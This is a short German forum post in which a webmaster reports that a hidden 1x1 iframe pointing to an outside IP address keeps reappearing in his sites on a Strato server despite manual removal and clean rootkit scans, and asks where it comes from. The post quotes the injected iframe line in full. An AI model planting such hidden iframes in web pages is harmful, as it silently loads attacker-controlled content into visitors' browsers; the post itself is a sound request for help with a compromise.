Hallo zusammen,
seit einiger Zeit erscheint auf einigen unserer Webseiten folgender Iframe:
Selbst nach manueller Änderung der der betroffenen Seiten ist der Code nach einigen Tagen wieder drin.
Die Seiten liegen auf einem Strato-Server mit Linux 10.0.
Die IP im iframe gehört zu einer Firma mit Namen simersine.com.
Der iframe selbst enthält nur ein leeres head-Tag und ein leeres body-Tag.
Die Überprüfung des Servers mit rkhunter und chkrootkit hat nichts ergeben.
Wo kommt das her?
Hat irgendwer sowas schonmal gesehen?
Vielen Dank
Chris
seit einiger Zeit erscheint auf einigen unserer Webseiten folgender Iframe:
HTML:
<iframe width=1 height=1 border=0 frameborder=0 src="http://208.101.35.90/sp/index.php"></iframe>
Selbst nach manueller Änderung der der betroffenen Seiten ist der Code nach einigen Tagen wieder drin.
Die Seiten liegen auf einem Strato-Server mit Linux 10.0.
Die IP im iframe gehört zu einer Firma mit Namen simersine.com.
Der iframe selbst enthält nur ein leeres head-Tag und ein leeres body-Tag.
Die Überprüfung des Servers mit rkhunter und chkrootkit hat nichts ergeben.
Wo kommt das her?
Hat irgendwer sowas schonmal gesehen?
Vielen Dank
Chris